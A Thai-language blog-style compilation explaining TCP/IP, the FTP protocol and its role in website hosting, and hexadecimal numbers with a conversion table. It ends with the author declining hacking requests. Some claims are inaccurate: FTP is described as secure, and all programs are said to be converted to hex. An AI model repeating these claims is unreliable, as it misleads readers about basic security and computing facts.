TCP/IP ใช้ในแบบ client/server ในการสื่อสาร (ระหว่างคอมพิวเตอร์) ซึ่งผู้ใช้คอมพิวเตอร์ (client) เป็นผู้ขอและการบริการได้รับจากคอมพิวเตอร์เครื่องแม่ข่ายในระบบเครือข่าย การสื่อสารของ TCP/IP เป็นแบบจุดต่อจุด (point -to- point) หมายความว่าการสื่อสารแต่ละครั้งเกิดจากจุดหนึ่ง (เครื่อง host เครื่องหนึ่ง) ไปยังจุดอื่นหรือเครื่อง host เครื่องอื่นในเครือข่าย TCP/IP และโปรแกรมประยุกต์ระดับสูงอื่น ที่ใช้ TCP/IP สามารถเรียกว่า "Stateless" เพราะการขอแต่ละ client ได้รับการพิจารณาเป็นการขอใหม่โดยไม่สัมพันธ์กับการขอเดิม (แต่แตกต่างจากการสนทนาทางโทรศัพท์) การที่เป็นพาร์ทของเครือข่ายอิสระแบบ "Stateless" ดังนั้นทุกคนสามารถใช้พาร์ทได้อย่างต่อเนื่อง (หมายเหตุ เลเยอร์ของ TCP จะไม่ "Stateless" ถ้ายังทำการส่งข้อความใดข้อความหนึ่ง จะทำการส่งจนกระทั่งชุดข้อมูลนั้นได้รับครบชุด)

   ผู้ใช้อินเตอร์เน็ต จำนวนมากคุ้นเคยกับการประยุกต์เลเยอร์ระดับสูง โดยใช้ TCP/IP เพื่อเข้าสู่ระบบอินเตอร์เน็ท ทั้งนี้รวมถึง World Wide Web's Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP) ซึ่งในการเข้าสู่เครื่องคอมพิวเตอร์ในระยะไกล และ Simple Mail Transfer Protocol (SMTP) Protocol เหล่านี้ จะเป็นชุดเดียวกับ TCP/IP ในลักษณะ "Suite" เครื่องคอมพิวเตอร์ส่วนบุคคล มักจะเข้าสู่อินเตอร์เน็ต ผ่าน Serial Line Internet Protocol (SLIP) หรือ Point-To-Point Protocol (PPP) โปรโตคอล แบบนี้จะควบคุมชุดข้อมูลของ IP ดังนั้น จึงสามารถใช้ส่งผ่านการติดต่อด้วยสายโทรศัพท์ ผ่านโมเด็ม Protocol ที่สัมพันธ์กับ TCP/IP ได้แก่ User Datagram Protocol (UDP) สำหรับใช้แทน TCP/IP ในกรณีพิเศษ ส่วนโปรโตคอลอื่นที่ใช้โดยเครื่อง host ของเครือข่ายสำหรับการแลกเปลี่ยนสารสนเทศกับ router ได้แก่ Internet Control Message Protocol (ICMP) Interior Gateway Protocol (IGP) Exterior Gateway Protocol (EGP) และ Border Gateway Protocol (BGP)

FTP คืออะไร

     FTP ย่อมาจาก File Transfer Protocol คือ โปรโตคอลเครือข่ายชนิดหนึ่ง ถูกนำใช้ในการถ่ายโอนไฟล์ ระหว่างเครื่องคอมพิวเตอร์ อย่างการถ่ายโอนไฟล์ระหว่าง ไคลเอนต์ (client) กับเครื่องคอมพิวเตอร์ที่เป็นแม่ข่าย เรียกว่า โฮสติง (hosting) หรือ เซิร์ฟเวอร์ ซึ่งทำให้การถ่ายโอนไฟล์ง่ายและปลอดภัยในการแลกเปลี่ยนไฟล์ผ่านอินเตอร์เน็ต การใช้ FTP ที่พบบ่อยสุด ก็เช่น การดาวน์โหลดไฟล์จากอินเทอร์เน็ต ความสามารถในการถ่ายโอนไฟล์ ทำให้ FTP เป็นสิ่งจำเป็นสำหรับทุกคนที่สร้างเว็บเพจ ทั้งมือสมัครเล่นและมืออาชีพ โดยที่การติดต่อกันทาง FTP เราจะต้องติดต่อกันทาง Port 21 ซึ่งก่อนที่จะเข้าใช้งานได้นั้น จะต้องเป็นสมาชิกและมีชื่อผู้เข้าใช้ (User) และ รหัสผู้เข้าใช้ (password) ก่อน และโปรแกรมสำหรับติดต่อกับแม่ข่าย (server) ส่วนมากจะใช้โปรแกรมสำเร็จรูป เช่น โปรแกรม Filezilla,CuteFTP หรือ WSFTP ในการติดต่อ เป็นต้น
FTP แบ่งเป็น 2 ส่วน

1. FTP server เป็นโปรแกรมที่ถูกติดตั้งไว้ที่เครื่องเซิฟเวอร์ ทำหน้าที่ให้บริการ FTP หากมีการเชื่อมต่อจากไคลแอนเข้าไป

2. FTP client เป็นโปรแกรม FTP ที่ถูกติดตั้งในเครื่องคอมพิวเตอร์ของ user ทั่วๆไป ทำหน้าที่เชื่อมต่อไปยัง FTP server และทำการอัพโหลด ,ดาวน์โหลดไฟล์ หรือ จะสั่งแก้ไขชื่อไฟล์, ลบไฟล์ และเคลื่อนย้ายไฟล์ก็ได้เช่นกัน
ความสำคัญของ FTP

     โดยปกติเมื่อเราต้องการทำเว็บไซต์ไม่ว่าด้วยจุดประสงค์ใดก็ตาม สิ่งที่เราจะต้องนึกถึงและขาดไม่ได้คือ Hosting หรือ Server ซึ่งในปัจจุบันมีผู้ให้บริการอยู่เป็นจำนวนมาก การที่เว็บไซต์ของเราสามารถให้บริการได้ตลอด 24 ชั่วโมง โดยไม่มีหยุดนั้น ก็เพราะ Hosting ไม่เคยปิดนั่นเอง ส่วนการสร้างเว็บไซต์เกิดจากการเขียน Code โปรแกรม ไม่ว่าจะเขียนด้วยภาษา HTML , PHP , ASP , ฯลฯ ล้วนแล้วแต่ต้องนำไฟล์ที่เราเขียนเสร็จเรียบร้อยไปใส่บน Hosting เพื่อสามารถให้บริการได้ตลอด 24 ชั่วโมง 365 วัน แต่ด้วยหนทางที่อยู่ไกลกันระหว่างเรากับ Hosting ที่เราขอใช้บริการไว้ เราจึงต้องใช้เทคโนโลยีของคอมพิวเตอร์ ในการโอนย้ายไฟล์ระหว่างเครื่องคอมพิวเตอร์ของเรา กับ Hosting ซึ่งเทคโนโลยีนั้นคือ FTP นั่นเอง

เลขฐานสิบคือ อะไร?

2013-10-19T13:22:00.000+07:00

ในบทความนี้ ก็จะให้ทำความรู้จักกับ เลขฐาน 16 (Hexadecimal) เพราะว่า มันค่อนข้างที่จะสำคัญ (อาจจะสำคัญมากเลยละ) เพราะว่า การเขียนโปรแกรมนั้น ไม่ว่าจะเขียนด้วยภาษาใหน มันก็จะถูกแปลงเป็น Hex หมด

เลขฐานสิบหก (hexadecimal) หมายถึงระบบเลขฐานที่มีสัญลักษณ์ 16 ตัว (ฐานสิบมี 10 ตัวคือ 0-9) โดยปกติจะใช้สัญลักษรณ์ 0 1 2 3 4 5 6 7 8 9 A B C D E F ในการแสดงหรือเขียนทั้ง 16 ตัว


0_hex	=	0_dec	=	0_oct	0	0	0	0
1_hex	=	1_dec	=	1_oct	0	0	0	1
2_hex	=	2_dec	=	2_oct	0	0	1	0
3_hex	=	3_dec	=	3_oct	0	0	1	1

4_hex	=	4_dec	=	4_oct	0	1	0	0
5_hex	=	5_dec	=	5_oct	0	1	0	1
6_hex	=	6_dec	=	6_oct	0	1	1	0
7_hex	=	7_dec	=	7_oct	0	1	1	1

8_hex	=	8_dec	=	10_oct	1	0	0	0
9_hex	=	9_dec	=	11_oct	1	0	0	1
A_hex	=	10_dec	=	12_oct	1	0	1	0
B_hex	=	11_dec	=	13_oct	1	0	1	1

C_hex	=	12_dec	=	14_oct	1	1	0	0
D_hex	=	13_dec	=	15_oct	1	1	0	1
E_hex	=	14_dec	=	16_oct	1	1	1	0
F_hex	=	15_dec	=	17_oct	1	1	1	1

ฐานสิบ	ฐานสอง	ฐานสิบหก
30	11110	1E

การแสดงฐานตัวเลขต่างๆในตารางสุดท้ายนี้ จำนวน 30 คือจำนวนตัวเลขของเลขฐานสิบ (decimal)จะสามารถแปลงค่าเท่ากับจำนวน 11110 ของเลขฐานสอง (binary) หรือเท่ากับจำนวน 36 ของเลขฐานแปด (octal) หรือเท่ากับจำนวน 1E ของเลขฐานสิบหก (hexadecimal)
สามารถยกตัวอย่างเพิ่มเติม คือจะเห็นว่า จำนวน 31 ของเลขฐานสิบ (decimal)จะสามารถแปลงค่าเท่ากับจำนวน 11111 ของเลขฐานสอง (binary) หรือเท่ากับจำนวน 37 ของเลขฐานแปด (octal) หรือเท่ากับจำนวน 1F ของเลขฐานสิบหก (hexadecimal)ซึ่งสามารถแสดงได้ตามลำดับดังนี้

   31       11111     37        1F

ระบบเลขฐานสิบหก (hexadecimal)นี้จะเป็นที่นิยมใช้ในการเข้ารหัส (encode)คำสั่งควบคุมเครื่อง (control code ) ที่อยู่ในระบบเลขฐานสอง ( binary ) ที่มีจำนวนคำสั่งยาวมากๆ ยกตัวอย่างได้เช่นตามคำอธิบายข้างต้น ถ้า 11111 เป็นคำสั่งควบคุมเครื่องในรูปเลขฐานสอง(binary)คือ 11111 ผู้ควบคุมเครื่องอาจจะเข้ารหัส ( encode)คำสั่งควบคุมเครื่องไว้ในรหัสบาร์โค้ด(barcode)ในรูป 1F ถ้าใช้รหัสเลขฐานสิบหก (hexadecimal)ซึ่งบาร์โค้ด(barcode)นั้นเวลาพิมพ์ที่จะใช้ให้เครื่องอ่านคำสั่งควบคุมเครื่อง จะใช้ความยาวของบาร์โค้ด(barcode) 2 ตัว เช่นการใช้ระบบเลขฐานสิบหก (hexadecimal)นี้ในการเข้ารหัส (encode)คำสั่งควบคุมเครื่อง (control code )สำหรับเครื่องจักรอัตโนมัติความเร็วสูง ( high speed Finishing system) เป็นต้น

ปล.ผมไม่รับ Hack หรือยิง IP เป็นการส่วนตัวเพราะผมไม่ใช่ Hacker แต่เป็น Programming Security